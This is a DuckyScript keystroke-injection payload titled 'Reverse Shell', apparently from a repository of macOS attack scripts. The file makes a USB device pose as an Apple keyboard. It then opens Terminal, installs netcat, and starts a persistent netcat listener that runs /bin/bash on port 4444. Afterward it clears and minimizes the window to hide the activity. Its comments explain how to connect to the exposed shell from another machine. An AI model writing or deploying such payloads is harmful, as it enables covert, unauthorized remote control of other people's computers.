Files
MacOS-DuckyScripts/RECON/Reverse Shell.txt
T
2023-05-29 19:17:37 -05:00

56 lines
1.5 KiB
Plaintext

REM installs netcat using home-brew (can adjust delay)
REM Runs the command nohup nc -l -p 4444 -vvv -e /bin/bash to start a netcat listener on port 4444
REM Gui m minimizes the terminal window.
REM Now on your separate computer in your terminal Run the command 'nc <remote-ip> 4444'
REM replacing '<remote-ip>' with the IP address of the remote computer.
REM I've noticed that NC does not respond if you copy and paste so please type the I.P. out!
REM If the connection is successful, you should now have a remote shell session on the remote computer.
REM To kill the listening port (4444 in this case)
REM you can use the kill command followed by the process ID (PID#)
REM to find the PID use command ' ps -ef | grep "nc -lvp 4444" '
REM Once you have the PID # run the command 'kill <PID#>'
REM to check if the port is closed
REM on the target computer run the command 'netstat -tuln | grep 4444'
REM If the listening port is closed, there should be no output or listing for port 4444.
REM Requirements: install netcat on both the remote target and your computer 'brew install netcat'
REM Requirements: Remote computer's IP address or hostname
REM Title: Reverse Shell
REM Author: NARSTY
REM Target: MacOS
REM Version: 1.0
REM Category: Execution
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING brew install netcat
ENTER
DELAY 10000
STRING nohup nc -l -p 4444 -vvv -e /bin/bash
ENTER
DELAY 3500
STRING clear
ENTER
DELAY 1000
GUI m